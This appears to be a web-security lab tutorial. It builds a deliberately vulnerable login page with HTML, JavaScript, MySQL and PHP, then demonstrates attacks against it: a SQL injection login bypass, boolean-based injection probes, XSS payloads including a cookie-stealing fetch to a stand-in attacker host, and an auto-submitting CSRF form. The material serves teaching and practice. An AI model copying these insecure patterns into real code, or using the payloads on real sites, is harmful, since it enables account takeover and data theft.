Web Authentication Implementation and Common Vulnerability Exploitation
HTML Frontend Construction
Deploy Apache web server and verify functionality via loopback address. Create authentication interfaces within the web root directory.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Secure Portal</title>
<style>
body {
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
font-family: Arial, sans-serif;
background: #f5f5f5;
}
.auth-form {
background: white;
padding: 2rem;
border-radius: 8px;
box-shadow: 0 2px 10px rgba(0,0,0,0.1);
width: 320px;
}
input {
width: 100%;
padding: 8px;
margin: 8px 0;
border: 1px solid #ddd;
border-radius: 4px;
box-sizing: border-box;
}
button {
width: 100%;
padding: 10px;
background: #007bff;
color: white;
border: none;
border-radius: 4px;
cursor: pointer;
}
</style>
</head>
<body>
<div class="auth-form">
<h2>System Login</h2>
<form method="post" action="process.php">
<input type="text" id="acct" name="account" placeholder="Account ID" required>
<input type="password" id="pwd" name="credential" placeholder="Password" required>
<button type="button" onclick="verify()">Authenticate</button>
</form>
</div>
</body>
</html>
HTTP Method Characteristics
GET requests encode parameters within the URL, exposing data in browser history and server logs with length restrictions. POST transmits data in the request body, providing confidentiality for sensitive information and supporting larger payloads without client-side caching.
JavaScript Validation and DOM Manipulation
Implement client-side verification and dynamic content rendering.
<script>
function verify() {
const acct = document.getElementById("acct").value;
const pwd = document.getElementById("pwd").value;
if (!acct || !pwd) {
alert("Both fields are mandatory");
return;
}
document.write("<h1>Greetings, " + acct + "</h1>");
}
</script>
Injection Testing
Test HTML injection via input fields: <h3>Injected Content</h3>
Execute arbitrary code through script tags: <script>alert('Compromised')</script>
MySQL Database Backend
Initialize database services and configure user access controls.
-- Initialize schema
CREATE DATABASE IF NOT EXISTS app_database CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
USE app_database;
-- Create restricted user account
CREATE USER 'db_operator'@'localhost' IDENTIFIED BY 'Op3r@t0r!';
GRANT SELECT, INSERT, UPDATE ON app_database.* TO 'db_operator'@'localhost';
FLUSH PRIVILEGES;
-- Define user storage table
CREATE TABLE credentials (
uid INT AUTO_INCREMENT PRIMARY KEY,
login_name VARCHAR(64) NOT NULL UNIQUE,
secret_key VARCHAR(128) NOT NULL,
registration_date TIMESTAMP DEFAULT CURRENT_TIMESTAMP
);
-- Seed test accounts
INSERT INTO credentials (login_name, secret_key) VALUES
('administrator', 'changeme'),
('guest', 'guest123');
PHP Backend Integration
Develop server-side authantication logic.
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
$account = $_POST['account'];
$credential = $_POST['credential'];
$host = "localhost";
$dbUser = "db_operator";
$dbPass = "Op3r@t0r!";
$dbName = "app_database";
$connection = new mysqli($host, $dbUser, $dbPass, $dbName);
if ($connection->connect_error) {
die("Database connection failed: " . $connection->connect_error);
}
// Query constructed through string concatenation (vulnerable)
$sqlCommand = "SELECT * FROM credentials WHERE login_name = '$account' AND secret_key = '$credential'";
$queryResult = $connection->query($sqlCommand);
if ($queryResult && $queryResult->num_rows > 0) {
echo "<div style='color:green'>Access Granted: Welcome $account</div>";
} else {
echo "<div style='color:red'>Authentication Failed</div>";
}
$connection->close();
}
?>
Attack Vector Implementation
SQL Injection Exploitation
Authenticate without valid credentials using tautology attacks:
Payload: ' OR '1'='1' --
Execution Flow: The injected string terminates the original query condition and appends a universally true statement (1=1), efffectively converting the query to return all records regardless of password verification.
Cross-Site Scripting (XSS)
Inject executable payloads through input vectors:
Basic Alert: <script>alert('XSS')</script>
Cookie Exfiltration: <script>fetch('http://attacker.server/log?data='+document.cookie)</script>
Security Testing Framework Deployment
Utilize Pikachu vulnerability platform for structured penetration testing.
Boolean-Based SQL Injection:
Inject conditional statements to extract database structure through true/false differential responses:
- True condition:
' AND 1=1# - False condition:
' AND 1=2#
Reflected XSS:
Inject payloads into search parameters and URL fragments that execute within victim browser contexts without proper output encoding.
Cross-Site Request Forgery (CSRF):
Construct unauthorized state-changing requests:
- Capture legitimate profile modification requests via interception proxies
- Generate malicious HTML forms with pre-populated values:
<form action="http://target-site.com/modify_profile" method="POST" id="exploit">
<input type="hidden" name="contact_info" value="compromised@attacker.com">
</form>
<script>document.getElementById('exploit').submit();</script>
- Deploy on attacker-controlled domains and entice authenticated users to visit, triggering unintended profile modifications without anti-CSRF token validation.
